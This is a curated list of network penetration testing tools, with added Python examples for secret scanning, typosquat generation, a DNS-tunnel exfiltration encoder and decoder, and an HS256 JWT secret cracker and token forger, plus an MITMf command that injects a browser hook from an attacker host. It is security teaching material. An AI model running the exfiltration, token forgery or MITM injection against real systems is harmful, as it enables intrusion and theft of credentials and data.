A curated list of network penetration testing tools.

Latest commit 0e797fe Nov 8, 2018

Tools

Penetration Testing OS Distributions

  • Parrot Security OS - Distribution similar to Kali using the same repositories, but with additional features such as Tor and I2P integration.
  • Kali - GNU/Linux distribution designed for digital forensics and penetration testing.

Multi-paradigm Frameworks

  • Metasploit - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
  • Armitage - Java-based GUI front-end for the Metasploit Framework.
  • Faraday - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.

Network Vulnerability Scanners

  • OpenVAS - Open source vulnerability scanner forked from the last open source release of Nessus; maintained as part of Greenbone's GVM stack.
  • Nexpose - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.

Static Analyzers

  • OWASP Dependency Check - Open source software composition analysis tool that enumerates dependencies used by Java and .NET software (with experimental support for Python, Ruby, Node.js, C, and C++) and lists known vulnerabilities (CVEs) associated with those dependencies.
  • VisualCodeGrepper - Open source static code analysis tool with support for Java, C, C++, C#, PL/SQL, VB, and PHP. VisualCodeGrepper also conforms to OWASP best practices.
  • Brakeman - Static analysis security vulnerability scanner for Ruby on Rails applications.
  • cppcheck - Extensible C/C++ static analyzer focused on finding bugs.
  • FindBugs - Free software static analyzer to look for bugs in Java code.
  • sobelow - Security-focused static analysis for the Phoenix Framework.
  • bandit - Security oriented static analyser for Python code.
  • Progpilot - Static security analysis tool for PHP code.
  • ShellCheck - Static code analysis tool for shell script.
  • Codebeat (open source) - Open source implementation of commercial static code analysis tool with GitHub integration.
  • truffleHog - Git repository scanner that walks commit history looking for high-entropy strings and known secret patterns such as API keys.
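The approach truffleHog takes (flag long base64- or hex-looking strings whose Shannon entropy is unusually high) is simple enough to write by hand. The following is an added example, not code from this list or from truffleHog; it scans a few constructed lines of source instead of walking git history, and the thresholds (4.5 bits for base64 alphabets, 3.0 for hex, minimum length 20) are assumptions chosen for this example.

```python
import math
import re
from typing import List, Tuple

# Alphabets used to measure entropy; a string is scored against the
# alphabet of the regex that matched it.
BASE64_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
HEX_CHARS = "1234567890abcdefABCDEF"

# Assumed thresholds for this example: entropy in bits per character.
MIN_LEN = 20
BASE64_THRESHOLD = 4.5
HEX_THRESHOLD = 3.0

BASE64_RUN = re.compile(r"[A-Za-z0-9+/=]{%d,}" % MIN_LEN)
HEX_RUN = re.compile(r"[0-9a-fA-F]{%d,}" % MIN_LEN)


def shannon_entropy(data: str, charset: str) -> float:
    """Shannon entropy of `data` in bits per character, counted over `charset`."""
    if not data:
        return 0.0
    entropy = 0.0
    for ch in charset:
        p = data.count(ch) / len(data)
        if p > 0:
            entropy -= p * math.log2(p)
    return entropy


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str, float]]:
    """Return (line number, alphabet, string, entropy) for every suspect string.

    A hex string also matches the base64 regex, but a 16-symbol alphabet can
    never reach 4.5 bits, so it is only ever reported under "hex".
    """
    findings = []
    for lineno, line in enumerate(lines, 1):
        for s in BASE64_RUN.findall(line):
            e = shannon_entropy(s, BASE64_CHARS)
            if e > BASE64_THRESHOLD:
                findings.append((lineno, "base64", s, round(e, 2)))
        for s in HEX_RUN.findall(line):
            e = shannon_entropy(s, HEX_CHARS)
            if e > HEX_THRESHOLD:
                findings.append((lineno, "hex", s, round(e, 2)))
    return findings


# Constructed sample input. Line 1 uses the well-known placeholder secret from
# the AWS documentation; line 2 is a git-SHA-like value, which this heuristic
# flags too (a classic truffleHog false positive worth knowing about).
SAMPLE_LINES = [
    'AWS_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"',
    'commit_sha = "0123456789abcdef0123456789abcdef01234567"',
    'api_token = "3f8a9c2b1e7d4f6a0b9c8d7e6f5a4b3c2d1e0f9a"',
    'message = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"',
    'url = "https://example.com/path/to/resource"',
]

if __name__ == "__main__":
    for lineno, kind, secret, entropy in scan_lines(SAMPLE_LINES):
        print(f"line {lineno}: {kind} candidate (entropy {entropy}): {secret}")
```

Lines 4 and 5 are not reported: a repeated character has zero entropy, and ordinary URL paths stay well below the base64 threshold. Pair the entropy check with pattern rules (AWS key prefixes, `-----BEGIN` PEM headers) to cut the false positives that pure entropy produces on hashes and commit IDs.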

Web Vulnerability Scanners

  • Netsparker Web Application Security Scanner - Commercial web application security scanner to automatically find many different types of security flaws.
  • OWASP Zed Attack Proxy (ZAP) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
  • Nikto - Noisy but fast black box web server and web application vulnerability scanner.
  • WPScan - Black box WordPress vulnerability scanner.
  • cms-explorer - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
  • ACSTIS - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
  • SQLmate - Companion to sqlmap that finds candidate SQL injection targets from a Google dork and, optionally, a given website.
  • ASafaWeb - Free online scanner for common ASP.NET web application misconfigurations.

Network Tools

  • pig - GNU/Linux packet crafting tool.
  • Network-Tools.com - Website offering an interface to numerous basic network utilities like ping, traceroute, whois, and more.
  • Intercepter-NG - Multifunctional network toolkit.
  • Legion - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
  • dsniff - Collection of tools for network auditing and pentesting.
  • scapy - Python-based interactive packet manipulation program & library.
  • Printer Exploitation Toolkit (PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
  • Praeda - Automated multi-function printer data harvester for gathering usable data during security assessments.
  • routersploit - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
  • impacket - Collection of Python classes for working with network protocols.
  • dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • THC Hydra - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
  • Ncat - Nmap project's netcat reimplementation; reads and writes data across TCP and UDP connections, with SSL and proxy support.
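To make concrete what a domain permutation engine such as dnstwist actually generates, here is an added example (not code from this list or from dnstwist) that produces the common typosquat classes for a domain: character omission, transposition, adjacent-key replacement and insertion, ASCII homoglyphs, hyphenation, bitsquatting, and TLD swaps. The keyboard adjacency map, the homoglyph table, and the TLD list are deliberately small assumptions for illustration; the real tool ships fuller tables, Unicode confusables, and then resolves and fingerprints every candidate.

```python
from typing import Dict, Set

# Assumption: partial QWERTY adjacency; dnstwist has full maps for several layouts.
KEYBOARD_NEIGHBORS = {
    "a": "qwsz", "b": "vghn", "c": "xdfv", "d": "serfcx", "e": "wsdr",
    "f": "drtgvc", "g": "ftyhbv", "h": "gyujnb", "i": "ujko", "j": "huikmn",
    "k": "jiolm", "l": "kop", "m": "njk", "n": "bhjm", "o": "iklp",
    "p": "ol", "q": "wa", "r": "edft", "s": "awedxz", "t": "rfgy",
    "u": "yhji", "v": "cfgb", "w": "qase", "x": "zsdc", "y": "tghu", "z": "asx",
}
# Assumption: ASCII look-alikes only; Unicode confusables (IDN) are out of scope here.
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5", "g": "9", "b": "8"}
TLDS = ["com", "net", "org", "co", "io"]


def _valid_label(label: str) -> bool:
    """RFC 1035 hostname label: 1-63 chars, alnum or '-', no leading/trailing '-'."""
    return (0 < len(label) <= 63
            and not label.startswith("-") and not label.endswith("-")
            and all(c.isascii() and (c.isalnum() or c == "-") for c in label))


def permutations(domain: str) -> Dict[str, Set[str]]:
    """Return candidate look-alike domains grouped by the fuzzer that produced them."""
    name, _, tld = domain.lower().rpartition(".")  # assumes a single-label TLD
    labels: Dict[str, Set[str]] = {}
    labels["omission"] = {name[:i] + name[i + 1:] for i in range(len(name))}
    labels["transposition"] = {name[:i] + name[i + 1] + name[i] + name[i + 2:]
                               for i in range(len(name) - 1) if name[i] != name[i + 1]}
    labels["replacement"] = {name[:i] + c + name[i + 1:]
                             for i, ch in enumerate(name) for c in KEYBOARD_NEIGHBORS.get(ch, "")}
    labels["insertion"] = {name[:i] + c + name[i:]
                           for i in range(1, len(name)) for c in KEYBOARD_NEIGHBORS.get(name[i - 1], "")}
    labels["homoglyph"] = {name[:i] + HOMOGLYPHS[ch] + name[i + 1:]
                           for i, ch in enumerate(name) if ch in HOMOGLYPHS}
    labels["hyphenation"] = {name[:i] + "-" + name[i:] for i in range(1, len(name))}
    # Bitsquatting: a single flipped bit in a label character, as happens in
    # faulty RAM. Invalid characters are filtered out below.
    labels["bitsquatting"] = {name[:i] + chr(ord(ch) ^ (1 << bit)).lower() + name[i + 1:]
                              for i, ch in enumerate(name) for bit in range(8)}

    result: Dict[str, Set[str]] = {}
    for kind, candidates in labels.items():
        result[kind] = {f"{l}.{tld}" for l in candidates if _valid_label(l)} - {domain}
    result["tld-swap"] = {f"{name}.{t}" for t in TLDS if t != tld}
    return result


def all_candidates(domain: str) -> Set[str]:
    """Flattened, de-duplicated candidate set across every fuzzer."""
    return set().union(*permutations(domain).values())


if __name__ == "__main__":
    for kind, found in permutations("example.com").items():
        print(f"{kind:14s} {len(found):4d}  e.g. {sorted(found)[:3]}")
    print("total unique:", len(all_candidates("example.com")))
```

The output set is the input to the interesting part of dnstwist: resolving each candidate, then comparing MX records, web page similarity and certificate data against the legitimate domain to find the ones somebody has actually registered.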

Exfiltration Tools

  • HTTPTunnel - Tunnel data over pure HTTP GET/POST requests.
  • Data Exfiltration Toolkit (DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
  • pwnat - Punches holes in firewalls and NATs.
  • tgcd - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
  • Iodine - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
  • PassHunt - Search file systems for passwords.
  • PANHunt - Search file systems for credit cards.
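DNS tunnelling tools such as Iodine and the DNS channel in DET work because outbound DNS is almost always permitted: the client encodes data into the labels of query names under a domain whose authoritative server the attacker controls, and the server reassembles it. The following added example (not code from this list or from Iodine) shows the encoding side of that channel within the RFC 1035 limits (63 characters per label, 253 per name), the matching decoder, and the length heuristic a defender can use to spot it. The session prefix, the sequence-number format, the sample payload and the detection thresholds are all assumptions made for this example; real tools add acknowledgements, retransmission and a control channel.

```python
import base64
from typing import List

MAX_LABEL = 63   # RFC 1035: one label
MAX_NAME = 253   # RFC 1035: whole presentation-format name


def _b32(data: bytes) -> str:
    # Base32 survives case-folding by resolvers, unlike base64.
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(data: bytes, domain: str, session: str = "s7") -> List[str]:
    """Split `data` into query names of the form <session><seq>.<labels...>.<domain>."""
    encoded = _b32(data)
    header_len = len(session) + 4                      # 4-digit sequence number
    budget = MAX_NAME - len(domain) - 1 - header_len - 1
    per_query = (budget // (MAX_LABEL + 1)) * MAX_LABEL  # whole 63-char labels only
    if per_query <= 0:
        raise ValueError("domain too long to leave room for payload labels")
    queries = []
    for seq, start in enumerate(range(0, len(encoded), per_query)):
        chunk = encoded[start:start + per_query]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"{session}{seq:04d}", *labels, domain])
        assert len(name) <= MAX_NAME
        queries.append(name)
    return queries


def decode_queries(queries: List[str], domain: str, session: str = "s7") -> bytes:
    """Reassemble the payload from query names, tolerating any arrival order."""
    parts = {}
    for name in queries:
        if not name.endswith("." + domain):
            continue
        labels = name[: -len(domain) - 1].split(".")
        head, payload = labels[0], labels[1:]
        if not head.startswith(session):
            continue
        parts[int(head[len(session):])] = "".join(payload)
    return _unb32("".join(parts[k] for k in sorted(parts)))


def looks_like_tunnel(name: str, max_sub_len: int = 52, max_label: int = 40) -> bool:
    """Defender heuristic (assumed thresholds): unusually long subdomain data.

    Crudely treats the last two labels as the registrable domain.
    """
    sub = name.split(".")[:-2]
    return sum(len(l) for l in sub) > max_sub_len or any(len(l) > max_label for l in sub)


# Constructed sample payload: not a multiple of 5 bytes, so base32 padding is exercised.
SAMPLE_DATA = b"user=alice;pass=hunter2;card=4111111111111111" * 6 + b"!"
TUNNEL_DOMAIN = "t.example.com"  # assumed attacker-controlled zone

if __name__ == "__main__":
    for q in encode_queries(SAMPLE_DATA, TUNNEL_DOMAIN):
        print(len(q), q)
    print(decode_queries(encode_queries(SAMPLE_DATA, TUNNEL_DOMAIN), TUNNEL_DOMAIN) == SAMPLE_DATA)
```

Each query carries at most 189 base32 characters (about 118 bytes) under a 13-character domain, which is why tunnels are slow and noisy: a few kilobytes becomes dozens of long, high-entropy queries to one zone, which is exactly what the length heuristic and per-domain query-volume baselines catch.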

Network Reconnaissance Tools

  • Shodan - Search engine that indexes service banners from Internet-connected hosts collected by continuous active scanning.
    • pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
  • zmap - Open source network scanner that enables researchers to easily perform Internet-wide network studies.
  • nmap - Free security scanner for network exploration & security audits.
  • Netdiscover - Simple and quick network scanning tool.
  • xprobe2 - Open source operating system fingerprinting tool.
  • CloudFail - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
  • masscan - Asynchronous TCP port scanner that emits SYN packets at line rate; with enough bandwidth it can sweep the entire IPv4 address space in minutes.
  • smbmap - Handy SMB enumeration tool.
  • LdapMiner - Multiplatform LDAP enumeration utility.
  • ldapsearch - Linux command line utility for querying LDAP servers.
  • ACLight - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
  • Pentest-Tools - Online suite of various different pentest related tools.

Protocol Analyzers and Sniffers

  • tcpdump/libpcap - Common packet analyzer that runs under the command line.
  • Wireshark - Widely-used graphical, cross-platform network protocol analyzer.
  • Yersinia - Layer 2 attack tool targeting protocols such as STP, CDP, DTP, DHCP, HSRP and 802.1Q, with a packet analysis mode.
  • Fiddler - Cross platform HTTP/HTTPS debugging proxy that captures and lets you modify web traffic.
  • netsniff-ng - Swiss army knife for network sniffing.
  • Dshell - Network forensic analysis framework.

Proxies and MITM Tools

  • Responder - Open source NBT-NS, LLMNR, and MDNS poisoner.
  • Responder-Windows - Windows version of the above NBT-NS/LLMNR/MDNS poisoner.
  • MITMf - Multipurpose man-in-the-middle framework.
    • e.g. mitmf --arp --spoof -i eth0 --gateway 192.168.1.1 --targets 192.168.1.20 --inject --js-url http://192.168.1.137:3000/hook.js
  • dnschef - Highly configurable DNS proxy for pentesters.
  • mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
  • Morpheus - Automated ettercap TCP/IP Hijacking tool.
  • mallory - HTTP/HTTPS proxy over SSH.
  • SSH MITM - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
  • evilgrade - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
  • Ettercap - Comprehensive, mature suite for machine-in-the-middle attacks.
  • BetterCAP - Modular, portable and easily extensible MITM framework.

Wireless Network Tools

  • Aircrack-ng - Set of tools for auditing wireless networks.
  • Wifite - Automated wireless attack tool.
  • wifi-pickle - Fake access point attacks.
  • MANA Toolkit - Rogue AP and man-in-the-middle utility.
  • Fluxion - Suite of automated social engineering based WPA attacks.

Transport Layer Security Tools

  • tlssled - Comprehensive TLS/SSL testing suite.
  • SSLyze - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
  • SSL Labs - Online TLS/SSL testing suite for revealing supported TLS/SSL versions and ciphers.
  • crackpkcs12 - Multithreaded program to crack the password on PKCS#12 files (.p12 and .pfx extensions), which bundle a private key with its TLS/SSL certificate.

Web Exploitation

  • Browser Exploitation Framework (BeEF) - Command and control server for delivering exploits to commandeered Web browsers.
  • Wordpress Exploit Framework - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
  • WPSploit - Exploit WordPress-powered websites with Metasploit.
  • SQLmap - Automated SQL injection and database takeover tool.
  • sqlninja - Automated SQL injection and database takeover tool.
  • tplmap - Automatic server-side template injection and Web server takeover tool.
  • weevely3 - Weaponized web shell.
  • wafw00f - Identifies and fingerprints Web Application Firewall (WAF) products.
  • fimap - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
  • Kadabra - Automatic LFI exploiter and scanner.
  • Kadimus - LFI scan and exploit tool.
  • liffy - LFI exploitation tool.
  • Commix - Automated all-in-one operating system command injection and exploitation tool.
  • sslstrip - Demonstration of the HTTPS stripping attacks.
  • sslstrip2 - Fork of sslstrip that bypasses HSTS by rewriting hostnames in links (used together with dns2proxy).
  • NoSQLmap - Automatic NoSQL injection and database takeover tool.
  • VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
  • FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
  • EyeWitness - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
  • webscreenshot - A simple script to take screenshots of list of websites.
  • IIS-Shortname-Scanner - Command line tool to exploit the Windows IIS tilde information disclosure vulnerability.

Hex Editors

  • HexEdit.js - Browser-based hex editing.
  • Hexinator - Proprietary, commercial hex editor that can parse binaries against user-defined file format grammars.
  • Frhed - Binary file editor for Windows.
  • Cheat Engine - Memory debugger and hex editor for running applications.

File Format Analysis Tools

  • Kaitai Struct - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • Veles - Binary data visualization and analysis tool.
  • Hachoir - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.

Anti-virus Evasion Tools

  • shellsploit - Generates custom shellcode, backdoors, injectors, optionally obfuscates every byte via encoders.
  • Hyperion - Runtime encryptor for 32-bit portable executables ("PE .exes").
  • AntiVirus Evasion Tool (AVET) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
  • peCloak.py - Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
  • peCloakCapstone - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
  • UniByAv - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
  • Shellter - Dynamic shellcode injection tool that infects existing PE executables by inserting payloads along their actual execution flow.

Hash Cracking Tools

  • Hashcat - Fast hash cracking utility with support for most known hashes as well as OpenCL and CUDA acceleration.
  • John the Ripper - Fast password cracker.
  • CeWL - Generates custom wordlists by spidering a target's website and collecting unique words.
  • JWT Cracker - Simple HS256 JWT token brute force cracker.
  • Rar Crack - RAR bruteforce cracker.
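An HS256 JWT is only as strong as its shared secret, which is why a tool like JWT Cracker exists: the signature is HMAC-SHA256 over `base64url(header).base64url(payload)`, so anyone holding a token can test candidate secrets offline, and a recovered secret lets them mint tokens for any claims they like. The following added example (not code from this list or from JWT Cracker) does the whole loop with the standard library: issue a token, crack its secret from a wordlist, forge an elevated token, and check that the server-side verifier accepts it. The token, the weak secret `secret123` and the wordlist are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _hs256(signing_input: str, secret: str) -> bytes:
    return hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()


def make_token(payload: dict, secret: str) -> str:
    """Issue an HS256 JWT. The forger uses exactly the same routine once it has the secret."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}"
    return f"{signing_input}.{_b64url(_hs256(signing_input, secret))}"


def verify(token: str, secret: str) -> Optional[dict]:
    """Server-side check: returns the payload if the signature matches, else None."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(_unb64url(header_b64))
    if header.get("alg") != "HS256":          # never trust alg from the token
        return None
    expected = _hs256(f"{header_b64}.{body_b64}", secret)
    if not hmac.compare_digest(expected, _unb64url(sig_b64)):
        return None
    return json.loads(_unb64url(body_b64))


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the HMAC for each candidate secret."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(_unb64url(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token: alg={header.get('alg')!r}")
    target = _unb64url(sig_b64)
    signing_input = f"{header_b64}.{body_b64}"
    for candidate in wordlist:
        # Plain == is fine here: the attacker holds the token, so timing leaks nothing.
        if _hs256(signing_input, candidate) == target:
            return candidate
    return None


# Constructed sample: a token issued with a weak secret, and a small wordlist.
WEAK_SECRET = "secret123"
TOKEN = make_token({"sub": "alice", "role": "user"}, WEAK_SECRET)
WORDLIST = ["password", "123456", "changeme", "secret", "secret123", "letmein"]

if __name__ == "__main__":
    recovered = crack_hs256(TOKEN, WORDLIST)
    print("recovered secret:", recovered)
    forged = make_token({"sub": "alice", "role": "admin"}, recovered)
    print("server accepts forged token:", verify(forged, WEAK_SECRET))
```

Hashcat mode 16500 does the same computation on GPUs at hundreds of millions of candidates per second, so the fix is a secret with real entropy (32+ random bytes) or an asymmetric algorithm such as RS256/ES256 where the verifying key cannot sign.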

Windows Utilities

  • Sysinternals Suite - The Sysinternals Troubleshooting Utilities.
  • PowerSploit - PowerShell Post-Exploitation Framework.
  • Headstart - Lazy man's Windows privilege escalation tool utilizing PowerSploit.
  • mimikatz - Credentials extraction tool for Windows operating system.
  • Windows Credentials Editor - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
  • Bloodhound - Graph-based Active Directory attack path explorer that maps group memberships, sessions, ACLs and trust relationships.
  • Empire - Pure PowerShell post-exploitation agent.
  • Fibratus - Tool for exploration and tracing of the Windows kernel.
  • redsnarf - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
  • Magic Unicorn - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or certutil (using fake certificates).
  • DeathStar - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
  • Hyena - NetBIOS exploitation tool.

GNU/Linux Utilities

  • Linux Exploit Suggester - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
  • Lynis - Security auditing tool for Linux and macOS.

macOS Utilities

  • Bella - Pure Python post-exploitation data mining and remote administration tool for macOS.
  • Lynis - Security auditing tool for Linux and macOS.

Social Engineering Tools

OSINT Tools

  • Shodan - World's first search engine for Internet-connected devices.
      • pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
  • Maltego - Proprietary software for open source intelligence and forensics, from Paterva.
  • Mxtoolbox - Email domain and DNS lookup.
  • Robtex - Domain and IP address lookup.
  • theHarvester - E-mail, subdomain and people names harvester.
  • DNSDumpster - Online DNS recon and search service.
  • dnsenum - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
  • dnsmap - Passive DNS network mapper.
  • dnsrecon - DNS enumeration script.
  • dnstracer - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
  • passivedns-client - Library and query tool for querying several passive DNS providers.
  • passivedns - Network sniffer that logs all DNS server replies for use in a passive DNS setup.
  • creepy - Geolocation OSINT tool.
  • Google Hacking Database - Database of Google dorks; can be used for recon.
  • GooDork - Command line Google dorking tool.
  • dork-cli - Command line Google dork tool.
  • Censys - Collects data on hosts and websites through daily ZMap and ZGrab scans.
  • recon-ng - Full-featured Web Reconnaissance framework written in Python.
  • github-dorks - CLI tool to scan github repos/organizations for potential sensitive information leak.
  • vcsmap - Plugin-based tool to scan public version control systems for sensitive information.
  • Spiderfoot - Open source OSINT automation tool with a Web UI and report visualizations.
  • Threat Crowd - Search engine for threats.
  • Virus Total - Free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.
  • PacketTotal - Simple, free, high-quality packet capture file analysis facilitating the quick detection of network-borne malware (using Bro and Suricata IDS signatures under the hood).
  • gOSINT - OSINT tool with multiple modules and a telegram scraper.
  • Amass - Subdomain enumeration via scraping, web archives, brute forcing, permutations, reverse DNS sweeping, TLS certificates, passive DNS data sources, etc.
  • XRay - Tool for recon, mapping and OSINT gathering from public networks.
  • Intel Techniques Online Tools - Collection of custom online search tools for OSINT work.

Anonymity Tools

  • Tor - Free software and onion routed overlay network that helps you defend against traffic analysis.
  • I2P - The Invisible Internet Project.
  • OnionScan - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
  • What Every Browser Knows About You - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.

Reverse Engineering Tools

  • VirusTotal - Online multi-engine malware scanner for files and URLs.
  • Hybrid Analysis - Online malware analysis sandbox producing behavioural reports.
  • Interactive Disassembler (IDA Pro) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, IDA Free.
  • WDK/WinDbg - Windows Driver Kit and WinDbg.
  • OllyDbg - x86 debugger for Windows binaries that emphasizes binary code analysis.
  • Radare2 - Open source, cross-platform reverse engineering framework.
  • x64dbg - Open source x64/x32 debugger for Windows.
  • Immunity Debugger - Powerful way to write exploits and analyze malware.
  • Evan's Debugger - OllyDbg-like debugger for GNU/Linux.
  • Medusa - Open source, cross-platform interactive disassembler.
  • plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
  • peda - Python Exploit Development Assistance for GDB.
  • dnSpy - Tool to reverse engineer .NET assemblies.
  • binwalk - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
  • PyREBox - Python scriptable Reverse Engineering sandbox by Cisco-Talos.
  • Voltron - Extensible debugger UI toolkit written in Python.
  • Capstone - Lightweight multi-platform, multi-architecture disassembly framework.
  • rVMI - Virtual machine introspection based debugger (built on KVM and Rekall) that can inspect userspace processes, kernel drivers, and preboot environments from outside the guest.

Side-channel Tools

  • ChipWhisperer - Complete open-source toolchain for side-channel power analysis and glitching attacks.

License

CC-BY

This work is licensed under a Creative Commons Attribution 4.0 International License.
